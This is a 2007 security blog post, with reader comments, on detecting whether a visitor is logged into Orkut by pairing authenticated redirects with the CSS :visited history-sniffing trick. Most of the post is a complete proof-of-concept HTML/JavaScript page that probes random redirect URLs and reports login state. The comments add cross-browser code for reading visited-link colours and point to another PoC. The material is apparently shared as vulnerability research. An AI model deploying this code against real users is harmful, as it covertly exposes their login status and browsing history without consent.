Monday, January 01, 2007

More Logged In User Detection via Authenticated Redirects

Ok, so what's changed since the 30th when I posted about this under a different name (Semi-Open Redirects), well, I thought of a better name and some new ways to exploit Authenticated Redirects.

Authenticated redirects should be self-explanatory, but essentially I just mean redirects which don't redirect you if you aren't logged on (or ones which redirect you only if you aren't logged on, but its a good enough name for me anyway).

Now, in my post about Semi-Open redirects, one of the constraints I hadn't thought of a circumvention for was the need to have an open redirect, so you could control where it redirects.

Since then I've realised that its not always necessary to control where the redirect sends users. Because we can already check if a user has visited a page through the CSS history hack!

Some common types of authenticated redirects which you can find on the internet are download pages which you need to login to view, which use redirects to track how many people are getting sent to each download or other link.

But anyway, these redirects are abundant, so here's the source to a working PoC for Orkut:
<html>
<body>
<script type="text/javascript">
    function iframe_callback() {
        if(temp.offsetHeight==1){
            alert('You are NOT logged into Orkut.');
        } else {
            alert('You ARE logged into Orkut.');
        }
        c.removeChild (temp);
        document.body.removeChild(orkut_iframe);
    }

    document.write( '<style type="text/css">#nicked a:link{color:#fff;}' );
    document.write( '#nicked a:visited{height:1px;width:1px;display:block;overflow:hidden;margin:1px;}' );
    document.write( '#nicked{font-size:1px;overflow:hidden;height:1px;margin:0;padding:0;}</style>' );
    var c = document.createElement('div');
    c.id='nicked';
    document.body.appendChild(c)
    
    var visited = true;
    var temp = document.createElement('a');;
    temp.innerHTML = 'test';
    c.appendChild(temp);
    var random, link;
    
    while (visited == true) {
    
        random=Math.floor(Math.random()*1000000);
        link = 'https://www.orkut.com/GLogin.aspx?done=https%3A%2F%2Fwww.orkut.com%2FNews.aspx%3Ftest%3D' + random;
    
        temp.href=link;
        if(temp.offsetHeight!=1){
            visited = false;
        }
    }
        
    var orkut_iframe = document.createElement('iframe');
    orkut_iframe.src = 'https://www.orkut.com/News.aspx?test=' + random;
    orkut_iframe.style.display = 'none';
    orkut_iframe.onload = iframe_callback;
    document.body.appendChild(orkut_iframe);
    
</script>
</body>
</html>


Note: This PoC works on the principal that Orkut redirects you to a login page with the URL of where you wanted to go in the URL, and so we create URL with a random number appended to the URL, and then we see if you were redirected to the login URL.

Oh, and credit to Christian Heilmann whose CSS detecting code I essentially stole, because he was the first one smart enough to get it working in all browsers and post the working version in a comment on Jeremiah's blog. If anyone is interested I ripped the code from here: http://icant.co.uk/sandbox/nickhistory.html

4 comments:

Anonymous said...

Alex, I've got a better working cross broswer version because both versions I saw did not work for me. And the visited link color(purple) is also correct in my example. I have not tested it in Opera, but MSIE & FF works.

Like:

var x = document.getElementById(el);
if (x.currentStyle) {
var y = x.currentStyle[color];
} else if (window.getComputedStyle) {
var y = document.defaultView.getComputedStyle
(x,null).getPropertyValue(color);
}

// Check visited link color:

if(y=='#800080') {
// MSIE color
}
if (y=="rgb(128, 0, 128)") {
// Mozilla/Gecko color
}

-Jungsonn

kuza55 said...

Hmmm, I must have forgotten to test it in IE, my mistake, I'll try to figure out what is causing it to not work.....

And the reason I didn't use link colour is because people were reporting problems with IE not displaying the link colour properly if the links were added after the document had loaded.

Does that code you posted solve the problem?

Anonymous said...

Hi Alex.

Yes, it worked for me on all levels.
I made a PoC last year:

http://www.jungsonnstudios.com/cool.php

To see the example:

1) turn on javascript
2) do not have "safe cache" ext. installed.
3) cache must be turned on in the browser.

If it doesn't work, I really like to hear it from you.

-Jungsonn

kuza55 said...

I'll get something working soon then. I figured out what one of the problems that PoC has in IE - its that onload attributes can seemingly only be set after the element has been appended to an object, so swapping those two lines around gets the code executing, but for some reason the CSS detection just doesn't seem to work.

How I hate writing PoC code......Its so much work, so much undocumented crap (well, with IE anyway, Firefox has good javascrippt docs) and its not even as if I'm ever going to personally use it......Oh well, I'll still fix it.....